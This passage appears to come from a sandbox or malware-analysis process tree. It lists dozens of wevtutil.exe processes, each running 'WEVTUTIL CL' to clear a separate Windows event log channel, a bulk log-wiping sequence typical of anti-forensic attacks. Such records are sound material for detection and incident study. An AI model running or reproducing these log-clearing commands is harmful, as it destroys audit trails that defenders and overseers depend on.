        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Steps-Recorder"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Debug"
        5⤵
        
        PID:3180
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Operational"
        5⤵
        
        PID:3600
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppxPackaging/Performance"
        5⤵
        
        PID:1920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Admin"
        5⤵
        
        PID:3000
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AssignedAccess/Operational"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Admin"
        5⤵
        
        PID:4592
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AssignedAccessBroker/Operational"
        5⤵
        
        PID:4920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AsynchronousCausality/Causality"
        5⤵
        
        PID:1296
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
        5⤵
        
        PID:3108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/GlitchDetection"
        5⤵
        
        PID:1808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/Informational"
        5⤵
        
        PID:2912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/PlaybackManager"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
        5⤵
        
        PID:2288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
        5⤵
        
        PID:3656
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUser-Client"
        5⤵
        
        PID:408
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
        5⤵
        
        PID:5004
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
        5⤵
        
        PID:364
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/HCI"
        5⤵
        
        PID:1912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BTH-BTHPORT/L2CAP"
        5⤵
        
        PID:376
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Diagnostic"
        5⤵
        
        PID:3292
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BTH-BTHUSB/Performance"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
        5⤵
        
        PID:2076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
        5⤵
        
        PID:1460
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
        5⤵
        
        PID:4128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Backup"
        5⤵
        
        PID:1452
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
        5⤵
        
        PID:2384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Battery/Diagnostic"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Biometrics/Analytic"
        5⤵
        
        PID:1028
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
        5⤵
        
        PID:1232
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        5⤵
        
        PID:3564
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
        5⤵
        
        PID:1164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Management"
        5⤵
        
        PID:992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker/BitLocker Operational"
        5⤵
        
        PID:4280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker/Tracing"
        5⤵
        
        PID:1436
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
        5⤵
        
        PID:384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
        5⤵
        
        PID:1816
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
        5⤵
        
        PID:4672
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bluetooth-Bthmini/Operational"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        5⤵
        
        PID:3852
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bluetooth-Policy/Operational"
        5⤵
        
        PID:3672
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
        5⤵
        
        PID:4384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        5⤵
        
        PID:4572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheMonitoring/Analytic"
        5⤵
        
        PID:4120
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
        5⤵
        
        PID:3204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
        5⤵
        
        PID:4440
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CAPI2/Catalog Database Debug"
        5⤵
        
        PID:4240
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
        5⤵
        
        PID:3908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
        5⤵
        
        PID:4876
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
        5⤵
        
        PID:1552
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/ApartmentInitialize"
        5⤵
        
        PID:3464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/ApartmentUninitialize"
        5⤵
        
        PID:5000
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/Call"
        5⤵
        
        PID:4768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/CreateInstance"
        5⤵
        
        PID:1128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/ExtensionCatalog"
        5⤵
        
        PID:1144
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/FreeUnusedLibrary"
        5⤵
        
        PID:2932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/RundownInstrumentation"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COMRuntime/Activations"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COMRuntime/MessageProcessing"
        5⤵
        
        PID:4112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
        5⤵
        
        PID:1468
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        5⤵
        
        PID:1500
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
        5⤵
        
        PID:4164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Cleanmgr/Diagnostic"
        5⤵
        
        PID:3000
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CloudStore/Debug"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CloudStore/Operational"
        5⤵
        
        PID:1732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
        5⤵
        
        PID:824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Analytic"
        5⤵
        
        PID:1932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Compat-Appraiser/Operational"
        5⤵
        
        PID:3308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Debug"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-BindFlt/Operational"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Debug"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-Wcifs/Operational"
        5⤵
        
        PID:2080
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Debug"
        5⤵
        
        PID:2752
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Containers-Wcnfs/Operational"
        5⤵
        
        PID:536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreApplication/Diagnostic"
        5⤵
        
        PID:3888
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreApplication/Operational"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreApplication/Tracing"
        5⤵
        
        PID:3636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
        5⤵
        
        PID:3292
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreWindow/Analytic"
        5⤵
        
        PID:2076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CoreWindow/Debug"
        5⤵
        
        PID:1460
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        5⤵
        
        PID:4128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crashdump/Operational"
        5⤵
        
        PID:3096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
        5⤵
        
        PID:2196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-BCRYPT/Analytic"
        5⤵
        
        PID:5076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-CNG/Analytic"
        5⤵
        
        PID:4964
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
        5⤵
        
        PID:444
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Debug"
        5⤵
        
        PID:1152
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-DPAPI/Operational"
        5⤵
        
        PID:2812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-DSSEnh/Analytic"
        5⤵
        
        PID:4656
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-NCrypt/Operational"
        5⤵
        
        PID:5072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
        5⤵
        
        PID:4572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-RSAEnh/Analytic"
        5⤵
        
        PID:4120
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
        5⤵
        
        PID:3204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
        5⤵
        
        PID:3768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Analytic"
        5⤵
        
        PID:4240
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DAL-Provider/Operational"
        5⤵
        
        PID:3908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DAMM/Diagnostic"
        5⤵
        
        PID:2692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
        5⤵
        
        PID:1868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DDisplay/Analytic"
        5⤵
        
        PID:4968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DDisplay/Logging"
        5⤵
        
        PID:1352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DLNA-Namespace/Analytic"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
        5⤵
        
        PID:1508
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DSC/Admin"
        5⤵
        
        PID:1532
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DSC/Analytic"
        5⤵
        
        PID:4528
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DSC/Debug"
        5⤵
        
        PID:3200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DSC/Operational"
        5⤵
        
        PID:4164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
        5⤵
        
        PID:1732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Data-Pdf/Debug"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/Admin"
        5⤵
        
        PID:824
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
        5⤵
        
        PID:1572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deduplication/Diagnostic"
        5⤵
        
        PID:5060
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deduplication/Operational"
        5⤵
        
        PID:540
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deduplication/Performance"
        5⤵
        
        PID:1008
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deduplication/Scrubbing"
        5⤵
        
        PID:536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Defrag-Core/Debug"
        5⤵
        
        PID:396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
        5⤵
        
        PID:4404
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
        5⤵
        
        PID:4040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
        5⤵
        
        PID:4444
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceAssociationService/Performance"
        5⤵
        
        PID:1684
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceConfidence/Analytic"
        5⤵
        
        PID:4860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Operational"
        5⤵
        
        PID:280
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Verbose"
        5⤵
        
        PID:2076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
        5⤵
        
        PID:4352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
        5⤵
        
        PID:2276
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
        5⤵
        
        PID:4992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Admin"
        5⤵
        
        PID:4128
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Analytic"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Debug"
        5⤵
        
        PID:5036
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Operational"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
        5⤵
        
        PID:116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceUpdateAgent/Operational"
        5⤵
        
        PID:1164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
        5⤵
        
        PID:4668
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
        5⤵
        
        PID:524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Devices-Background/Operational"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
        5⤵
        
        PID:3748
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
        5⤵
        
        PID:4272
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
        5⤵
        
        PID:3848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
        5⤵
        
        PID:1144
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
        5⤵
        
        PID:1352
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
        5⤵
        
        PID:4812
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
        5⤵
        
        PID:1508
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
        5⤵
        
        PID:2176
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
        5⤵
        
        PID:1428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
        5⤵
        
        PID:1944
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
        5⤵
        
        PID:3992
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
        5⤵
        
        PID:4524
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
        5⤵
        
        PID:1756
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
        5⤵
        
        PID:3200
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        5⤵
        
        PID:4164
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        5⤵
        
        PID:2516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
        5⤵
        
        PID:1732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
        5⤵
        
        PID:4636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
        5⤵
        
        PID:1808
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        5⤵
        
        PID:2912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
        5⤵
        
        PID:2116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
        5⤵
        
        PID:4412
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
        5⤵
        
        PID:1680
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
        5⤵
        
        PID:3964
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        5⤵
        
        PID:2368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        5⤵
        
        PID:1828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        5⤵
        
        PID:3568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
        5⤵
        
        PID:4620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
        5⤵
        
        PID:1008
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
        5⤵
        
        PID:776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
        5⤵
        
        PID:536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
        5⤵
        
        PID:396
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Direct3D12/Analytic"
        5⤵
        
        PID:4404
    - - C:\Windows\system32\wevtutil.exe
